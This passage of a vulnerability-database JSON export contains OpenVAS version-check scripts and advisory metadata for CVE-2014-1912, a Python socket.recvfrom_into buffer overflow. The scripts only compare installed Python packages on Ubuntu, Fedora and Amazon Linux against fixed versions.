value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"2125-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-2125-1/\");\n script_summary(\"Check for the Version of python2.7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-0ubuntu3.5\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-0ubuntu3.5\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-0ubuntu3.6\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-0ubuntu3.6\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.6\", ver:\"2.6.5-1ubuntu6.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.6-minimal\", ver:\"2.6.5-1ubuntu6.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU13.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.5-8ubuntu3.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.5-8ubuntu3.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.3\", ver:\"3.3.2-7ubuntu3.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.3-minimal\", ver:\"3.3.2-7ubuntu3.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-5ubuntu4.4\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-5ubuntu4.4\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-6ubuntu3.5\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-6ubuntu3.5\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.3\", ver:\"3.3.0-1ubuntu0.2\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.3-minimal\", ver:\"3.3.0-1ubuntu0.2\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:53:24", "references": ["2014-2418", "https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128361.html"], "pluginID": "1361412562310867510", "description": "Check for the Version of python3", "edition": 4, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-02-17T00:00:00", "title": "Fedora Update for python3 FEDORA-2014-2418", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310867510", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867510", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-2418\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867510\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-17 11:38:03 +0530 (Mon, 17 Feb 2014)\");\n script_cve_id(\"CVE-2014-1912\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python3 FEDORA-2014-2418\");\n\n tag_insight = \"Python 3 is a new version of the language that is incompatible with the 2.x\nline of releases. The language is mostly the same, but many details, especially\nhow built-in objects like dictionaries and strings work, have changed\nconsiderably, and a lot of deprecated features have finally been removed.\n\";\n\n tag_affected = \"python3 on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2418\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128361.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of python3\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~9.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T14:32:15", "references": ["https://alas.aws.amazon.com/ALAS-2014-292.html"], "pluginID": "1361412562310120153", "description": "Amazon Linux Local Security Checks", "edition": 6, "reporter": "Eero Volotinen", "published": "2015-09-08T00:00:00", "title": "Amazon Linux Local Check: ALAS-2014-292", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-10-01T00:00:00", "id": "OPENVAS:1361412562310120153", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120153", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-292.nasl 7000 2017-08-24 11:51:46Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120153\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:18:43 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-292\");\n script_tag(name:\"insight\", value:\"Buffer overflow in the socket.recvfrom_into function in Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4, and 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary code via a crafted string.\");\n script_tag(name:\"solution\", value:\"Run yum update python26 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-292.html\");\n script_cve_id(\"CVE-2014-1912\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"python26-devel\", rpm:\"python26-devel~2.6.9~1.43.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"python26-libs\", rpm:\"python26-libs~2.6.9~1.43.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"python26-debuginfo\", rpm:\"python26-debuginfo~2.6.9~1.43.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"python26\", rpm:\"python26~2.6.9~1.43.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"python26-test\", rpm:\"python26-test~2.6.9~1.43.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"python26-tools\", rpm:\"python26-tools~2.6.9~1.43.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T14:33:13", "references": ["https://alas.aws.amazon.com/ALAS-2014-293.html"], "pluginID": "1361412562310120154", "description": "Amazon Linux Local Security Checks", "edition": 6, "reporter": "Eero Volotinen", "published": "2015-09-08T00:00:00", "title": "Amazon Linux Local Check: ALAS-2014-293", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-10-01T00:00:00", "id": "OPENVAS:1361412562310120154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120154", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-293.nasl 6637 2017-07-10 09:58:13Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120154\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:18:44 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-293\");\n script_tag(name:\"insight\", value:\"Buffer overflow in the socket.recvfrom_into function in Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4, and 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary code via a crafted string.\");\n script_tag(name:\"solution\", value:\"Run yum update python27 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-293.html\");\n script_cve_id(\"CVE-2014-1912\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"python27-tools\", rpm:\"python27-tools~2.7.5~11.32.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"python27-test\", rpm:\"python27-test~2.7.5~11.32.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~2.7.5~11.32.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"python27-debuginfo\", rpm:\"python27-debuginfo~2.7.5~11.32.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"python27-libs\", rpm:\"python27-libs~2.7.5~11.32.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"python27-devel\", rpm:\"python27-devel~2.7.5~11.32.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:49", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128243.html", "2014-2394"], "pluginID": "1361412562310867505", "description": "Check for the Version of python", "edition": 4, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-02-17T00:00:00", "title": "Fedora Update for python FEDORA-2014-2394", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310867505", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867505", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-2394\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867505\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-17 11:36:57 +0530 (Mon, 17 Feb 2014)\");\n script_cve_id(\"CVE-2014-1912\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python FEDORA-2014-2394\");\n\n tag_insight = \"Python is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nProgrammers can write new built-in modules for Python in C or C++.\nPython can be used as an extension language for applications that need\na programmable interface.\n\nNote that documentation for Python is provided in the python-docs\npackage.\n\nThis package provides the 'python' executable most of the actual\nimplementation is within the 'python-libs' package.\n\";\n\n tag_affected = \"python on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2394\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128243.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of python\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~10.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-19T13:03:48", "references": ["2125-1", "http://www.ubuntu.com/usn/usn-2125-1/"], "pluginID": "1361412562310841733", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-03-04T00:00:00", "title": "Ubuntu Update for python2.7 USN-2125-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310841733", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841733", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2125_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# Ubuntu Update for python2.7 USN-2125-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841733\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-04 10:50:18 +0530 (Tue, 04 Mar 2014)\");\n script_cve_id(\"CVE-2014-1912\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for python2.7 USN-2125-1\");\n\n\n script_tag(name:\"affected\", value:\"python2.7 on Ubuntu 13.10,\n Ubuntu 12.10,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"insight\", value:\"Ryan Smith-Roberts discovered that Python incorrectly handled\nbuffer sizes when using the socket.recvfrom_into() function. An attacker could\npossibly use this issue to cause Python to crash, resulting in denial of\nservice, or possibly execute arbitrary code.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2125-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2125-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python2.7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(12\\.04 LTS|10\\.04 LTS|13\\.10|12\\.10)\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-0ubuntu3.5\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-0ubuntu3.5\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-0ubuntu3.6\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-0ubuntu3.6\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.6\", ver:\"2.6.5-1ubuntu6.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.6-minimal\", ver:\"2.6.5-1ubuntu6.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU13.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.5-8ubuntu3.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.5-8ubuntu3.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.3\", ver:\"3.3.2-7ubuntu3.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.3-minimal\", ver:\"3.3.2-7ubuntu3.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-5ubuntu4.4\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-5ubuntu4.4\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-6ubuntu3.5\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-6ubuntu3.5\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.3\", ver:\"3.3.0-1ubuntu0.2\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.3-minimal\", ver:\"3.3.0-1ubuntu0.2\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:55:00", "references": ["http://www.debian.org/security/2014/dsa-2880.html"], "pluginID": "1361412562310702880", "description": "Multiple security issues were discovered in Python:\n\nCVE-2013-4238 \nRyan Sleevi discovered that NULL characters in the subject alternate\nnames of SSL cerficates were parsed incorrectly.\n\nCVE-2014-1912 \nRyan Smith-Roberts discovered a buffer overflow in the\nsocket.recvfrom_into() function.", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-03-17T00:00:00", "title": "Debian Security Advisory DSA 2880-1 (python2.7 - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2013-4238"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310702880", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702880", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2880.nasl 9354 